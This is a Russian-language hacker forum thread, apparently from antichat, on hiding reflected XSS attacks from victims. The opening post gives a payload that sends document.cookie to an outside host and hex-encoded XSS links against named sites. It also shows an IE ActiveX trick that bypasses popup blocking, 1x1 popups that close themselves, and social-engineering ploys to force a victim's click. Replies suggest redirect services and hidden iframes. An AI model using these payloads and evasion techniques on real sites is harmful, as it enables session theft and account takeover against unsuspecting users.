И так разработкой данного метода маскировки меня сподвигла огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа Code: http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script> да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url . идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков) но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX Code: <object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle> <PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object> <SCRIPT> function shellscript() { var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"); msgWindow=open(xss_site,"rastabzc","width=1,height=1'"); setTimeout(' msgWindow.close() ',4000) } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); } if (window.rasta!=true) { setTimeout(' main() ',100) } </script> где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><script>alert(1)</script>) но вот в Опере и Лисе ActiveX вообще нету. что же делать? наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом скажем так Code: <form name="f"> <input type="button" name="n" onClick="zet()"> </form> <script> document.f.n.click(); function zet() { msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'"); } </script> то блокировка всёравно как не жалко присутствует остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой) прибегнем немножко к социнженерии Code: <body onclick='zet()'> <script> function zet() { var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"); msgWindow=open(xss_site,"rastabzc","width=1,height=1'"); setTimeout(' msgWindow.close() ',4000); } </script> </body> помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью) вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен кому интересно прошу развивать тему
был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.
что то непонимаю как такое можно реализовать, простая переадресация всёравно выкидывает юзера на страницу с хсс где он обнаружит что то неладное.
ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать
авторизованные куки через ифрэйм как не жаль не будут ийти так как страница с фреймом находится на другом домене. можеш сам проверить например вставь в фрэйм сайт где у тебя запомнен пароль. ну тоесть при обычном вызове этого сайта ты будеш авторизирован а через фрэйм нет
~Real F@ck!~, https://forum.antichat.ru/thread43786.html ZET36, почему я не верю? Перестаньте нести дезинформацию в народ.